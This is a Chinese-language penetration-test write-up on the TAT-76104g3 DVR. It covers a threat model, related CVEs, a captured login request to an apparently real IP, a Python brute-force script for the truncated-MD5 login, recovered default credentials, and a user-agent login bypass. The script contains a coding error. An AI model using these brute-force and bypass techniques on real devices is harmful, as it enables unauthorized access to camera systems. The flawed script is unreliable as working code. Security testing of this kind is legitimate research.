# TAT-76104g3 漏洞挖掘研究 ### Test Target TAT-76104g3，4路400萬畫素五合一DVR(單硬碟)  ### System model  ### Threat model * Spoofing 1. 無身分驗證機制 2. 驗證機制不完整（可被繞過） * Tampering 1. 對各節點進行未經授權的動作 2. 針對 Log 的修改 * Repudiation 1. Log 不完整 2. 節點之間傳輸省略紀錄 * Information disclosure 1. 帳號密碼管理鬆散 2. 資料透過明文傳輸 3. 透過大量錯誤回報找出特定資訊 * Denial of service 1. 流量超出負荷 2. 透過偽造身份導致其他使用者無法使用服務 * Elevation of privilege 1. 權限控管失效，導致一般使用者可進行管理員權限的操作 2. 權限控管失效，導致一般使用者可偽造成其他使用者進行操作 * Physical security 1. 物理上的破壞 2. 實體存取接口 * Supply chain issues 1. Vendor 後續無針對產品進行安全維護及更新 Patch 2. 未定期更新所使用的元件  ### Test Plan * 韌體模擬 * 模糊測試 * 滲透測試 * 暴力破解密碼 * 破解密碼加密方式 * 繞過管理員權限 * Command Injection ### Demo 我的在下面，缺fuzzing ### Test coverage #### WEB部分 * Cross-Site Request Forgery 攻擊 * SQL injection 攻擊 * XSS 攻擊 * SSRF 攻擊 * Command Injection 攻擊 * LFI 攻擊 * SSRF 攻擊 * 不安全的 HTTP 連線，導致敏感資訊被竊取或外流 * 不正確的權限配置，讓一般使用者可以進行管理者操作 * 不正確的權限配置，讓一般使用者可以進行別的帳號的操作 ### Result analysis 待補 ### Related comparison * CVE-2020-3923 https://cve.report/CVE-2020-3923 由於錯誤的密碼認證機制使得攻擊者可以透過預設密碼獲得系統控制權。  * CVE-2020-3924 https://cve.report/CVE-2020-3924 在更新韌體補丁時沒有正確驗證補丁文件，使得攻擊者可以在補丁中注入惡意程式進而獲得系統控制權。  ### Conclusion 此台設備TAT-76104g3存在著兩個CVE，其中一個是由於沒有認證更新補丁所導致的惡意程式注入，另一個則是可獲取預設密碼。這兩個CVE皆沒有對外公開payload。 在本次測試中，針對登入介面，我們使用了數種方式成功繞過。並透過2種以上方式獲取到預設弱密碼。 並且透過一種方式在無需密碼與使用者權限的情況下能對DVR進行有限的操作。 ## MD5暴力破解 先使用dirsearch進行搜索，找出以下可疑檔案  ``` /config.js /result.html /md5.js ``` 獲得如下檔案 ```javascript= /* * A JavaScript implementation of the RSA Data Security, Inc. MD5 Message * Digest Algorithm, as defined in RFC 1321. * Version 2.1 Copyright (C) Paul Johnston 1999 - 2002. * Other contributors: Greg Holt, Andrew Kepert, Ydnar, Lostinet * Distributed under the BSD License * See http://pajhome.org.uk/crypt/md5 for more info. */ var hexcase = 0; var chrsz = 8; function hex_md5(s){ return binl2hex(core_md5(str2binl(s), s.length * chrsz));} function core_md5(x, len) { /* append padding */ x[len >> 5] |= 0x80 << ((len) % 32); x[(((len + 64) >>> 9) << 4) + 14] = len; var a = 1732584193; var b = -271733879; var c = -1732584194; var d = 271733878; for(var i = 0; i < x.length; i += 16) { var olda = a; var oldb = b; var oldc = c; var oldd = d; a = md5_ff(a, b, c, d, x[i+ 0], 7 , -680876936); d = md5_ff(d, a, b, c, x[i+ 1], 12, -389564586); c = md5_ff(c, d, a, b, x[i+ 2], 17, 606105819); b = md5_ff(b, c, d, a, x[i+ 3], 22, -1044525330); a = md5_ff(a, b, c, d, x[i+ 4], 7 , -176418897); d = md5_ff(d, a, b, c, x[i+ 5], 12, 1200080426); c = md5_ff(c, d, a, b, x[i+ 6], 17, -1473231341); b = md5_ff(b, c, d, a, x[i+ 7], 22, -45705983); a = md5_ff(a, b, c, d, x[i+ 8], 7 , 1770035416); d = md5_ff(d, a, b, c, x[i+ 9], 12, -1958414417); c = md5_ff(c, d, a, b, x[i+10], 17, -42063); b = md5_ff(b, c, d, a, x[i+11], 22, -1990404162); a = md5_ff(a, b, c, d, x[i+12], 7 , 1804603682); d = md5_ff(d, a, b, c, x[i+13], 12, -40341101); c = md5_ff(c, d, a, b, x[i+14], 17, -1502002290); b = md5_ff(b, c, d, a, x[i+15], 22, 1236535329); a = md5_gg(a, b, c, d, x[i+ 1], 5 , -165796510); d = md5_gg(d, a, b, c, x[i+ 6], 9 , -1069501632); c = md5_gg(c, d, a, b, x[i+11], 14, 643717713); b = md5_gg(b, c, d, a, x[i+ 0], 20, -373897302); a = md5_gg(a, b, c, d, x[i+ 5], 5 , -701558691); d = md5_gg(d, a, b, c, x[i+10], 9 , 38016083); c = md5_gg(c, d, a, b, x[i+15], 14, -660478335); b = md5_gg(b, c, d, a, x[i+ 4], 20, -405537848); a = md5_gg(a, b, c, d, x[i+ 9], 5 , 568446438); d = md5_gg(d, a, b, c, x[i+14], 9 , -1019803690); c = md5_gg(c, d, a, b, x[i+ 3], 14, -187363961); b = md5_gg(b, c, d, a, x[i+ 8], 20, 1163531501); a = md5_gg(a, b, c, d, x[i+13], 5 , -1444681467); d = md5_gg(d, a, b, c, x[i+ 2], 9 , -51403784); c = md5_gg(c, d, a, b, x[i+ 7], 14, 1735328473); b = md5_gg(b, c, d, a, x[i+12], 20, -1926607734); a = md5_hh(a, b, c, d, x[i+ 5], 4 , -378558); d = md5_hh(d, a, b, c, x[i+ 8], 11, -2022574463); c = md5_hh(c, d, a, b, x[i+11], 16, 1839030562); b = md5_hh(b, c, d, a, x[i+14], 23, -35309556); a = md5_hh(a, b, c, d, x[i+ 1], 4 , -1530992060); d = md5_hh(d, a, b, c, x[i+ 4], 11, 1272893353); c = md5_hh(c, d, a, b, x[i+ 7], 16, -155497632); b = md5_hh(b, c, d, a, x[i+10], 23, -1094730640); a = md5_hh(a, b, c, d, x[i+13], 4 , 681279174); d = md5_hh(d, a, b, c, x[i+ 0], 11, -358537222); c = md5_hh(c, d, a, b, x[i+ 3], 16, -722521979); b = md5_hh(b, c, d, a, x[i+ 6], 23, 76029189); a = md5_hh(a, b, c, d, x[i+ 9], 4 , -640364487); d = md5_hh(d, a, b, c, x[i+12], 11, -421815835); c = md5_hh(c, d, a, b, x[i+15], 16, 530742520); b = md5_hh(b, c, d, a, x[i+ 2], 23, -995338651); a = md5_ii(a, b, c, d, x[i+ 0], 6 , -198630844); d = md5_ii(d, a, b, c, x[i+ 7], 10, 1126891415); c = md5_ii(c, d, a, b, x[i+14], 15, -1416354905); b = md5_ii(b, c, d, a, x[i+ 5], 21, -57434055); a = md5_ii(a, b, c, d, x[i+12], 6 , 1700485571); d = md5_ii(d, a, b, c, x[i+ 3], 10, -1894986606); c = md5_ii(c, d, a, b, x[i+10], 15, -1051523); b = md5_ii(b, c, d, a, x[i+ 1], 21, -2054922799); a = md5_ii(a, b, c, d, x[i+ 8], 6 , 1873313359); d = md5_ii(d, a, b, c, x[i+15], 10, -30611744); c = md5_ii(c, d, a, b, x[i+ 6], 15, -1560198380); b = md5_ii(b, c, d, a, x[i+13], 21, 1309151649); a = md5_ii(a, b, c, d, x[i+ 4], 6 , -145523070); d = md5_ii(d, a, b, c, x[i+11], 10, -1120210379); c = md5_ii(c, d, a, b, x[i+ 2], 15, 718787259); b = md5_ii(b, c, d, a, x[i+ 9], 21, -343485551); a = safe_add(a, olda); b = safe_add(b, oldb); c = safe_add(c, oldc); d = safe_add(d, oldd); } return Array(a, b, c, d); } function md5_cmn(q, a, b, x, s, t) { return safe_add(bit_rol(safe_add(safe_add(a, q), safe_add(x, t)), s),b); } function md5_ff(a, b, c, d, x, s, t) { return md5_cmn((b & c) | ((~b) & d), a, b, x, s, t); } function md5_gg(a, b, c, d, x, s, t) { return md5_cmn((b & d) | (c & (~d)), a, b, x, s, t); } function md5_hh(a, b, c, d, x, s, t) { return md5_cmn(b ^ c ^ d, a, b, x, s, t); } function md5_ii(a, b, c, d, x, s, t) { return md5_cmn(c ^ (b | (~d)), a, b, x, s, t); } function safe_add(x, y) { var lsw = (x & 0xFFFF) + (y & 0xFFFF); var msw = (x >> 16) + (y >> 16) + (lsw >> 16); return (msw << 16) | (lsw & 0xFFFF); } function bit_rol(num, cnt) { return (num << cnt) | (num >>> (32 - cnt)); } function str2binl(str) { var bin = Array(); var mask = (1 << chrsz) - 1; for(var i = 0; i < str.length * chrsz; i += chrsz) bin[i>>5] |= (str.charCodeAt(i / chrsz) & mask) << (i%32); return bin; } function binl2hex(binarray) { var hex_tab = hexcase ? "0123456789ABCDEF" : "0123456789abcdef"; var str = ""; for(var i = 0; i < binarray.length * 4; i++) { str += hex_tab.charAt((binarray[i>>2] >> ((i%4)*8+4)) & 0xF) + hex_tab.charAt((binarray[i>>2] >> ((i%4)*8 )) & 0xF); } return str; } ``` 觀察該script，發現對password進行了MD5雜湊。但在雜湊後只使用了雜湊中的部分值。 透過burpsuite攔截封包查看 ```html POST /Login.htm HTTP/1.1 Host: 125.228.116.5 Content-Length: 38 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://125.228.116.5 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: 【IP】/Login.htm Accept-Encoding: gzip, deflate Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: NetSuveillanceWebCookie=%7B%22param1%22%3A%22root%22%2C%22username%22%3A%22%22%7D Connection: close command=login&param1=root&param2=xhsbl ``` 發現其只使用到hash當中長度為5的值作為密碼(param2)  可讓我們嘗試出存在的使用者帳戶。並且此機器沒有嘗試限制，可以使用暴力破解在不知道密碼的情況下破解hashvalue。暴力破解總數為(26+26+10)^5共916132832種組合方式。因此可撰寫腳本暴力攻破。 ```python= from requests import post set="9876543210zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA" for i in range(0,62): for j in range(0,62): for k in range(0,62): for l in range(0,62): for m in range(0,62): string="【IP】/Login.htm?param1=admin&param2="+set[i]+set[j]+set[k]+set[l]+set[m] web = requests.post(string) if("Log in failed, password error!" in web.text): continue else: print(i) ``` 雖然可成功爆破，但由於不知道密碼，且其每次回傳的5碼皆不同，因此難以再現，此方法雖可用但並不能更進一步獲得其他權限。但是卻給第二種方法提供了基石 ## MD5暴力破解2 在經過第一次MD5暴力破解後，我們發現每次回傳給伺服器的5碼都不同，但是演算法卻沒有改變，因此可以推斷伺服器每次都會傳送一個隨機的key給client端，用以產生MD5加密結果。因此我們一樣使用burpsuite攔截server端地回應以找出key。  我們在server端回應的其中一個html內找到了md5_key，並且我們手上有md5 hash所使用腳本，這些資訊足以讓我們進行正常的密碼爆破。 我們可以先利用該台DVR在account不存在時會吐出錯誤的情況來暴力出username，並且再透過md5去暴力獲取密碼。 最終得出以下資訊 ``` account:admin password:123456 ``` ## routersploit 使用routersploit發現以下漏洞，嘗試進行cmd盲注  嘗試令其curl指定IP以觀測盲注是否成功  未成功，判斷應為routersploit誤報  ## hydra 使用hydra可得出弱密碼 ``` account:admin password:123456 ``` ## useragent-bypass 在login介面時，我們發現這台機器在IE瀏覽器上的行為有別於chrome與edge。因此我們使用IE尋找突破口，並獲取了以下訊息。  可以發現在載入網頁時，如果遇到上述Msie、Firefox、Opera、Chorme等瀏覽器，頁面將會強制跳轉至Login.htm，因此我們可以使用burpsuite將userAgent修改，或許可繞過此頁面。 在我們修改過後，成功繞過了登入頁面，直接進入了管理員介面，但是造成有些resourse無法載入，然而在此處的設置等不需要管理員權限的操作被允許。 透過useragent的方式繞過登入介面可在沒有管理員的權限下做最低程度的控制。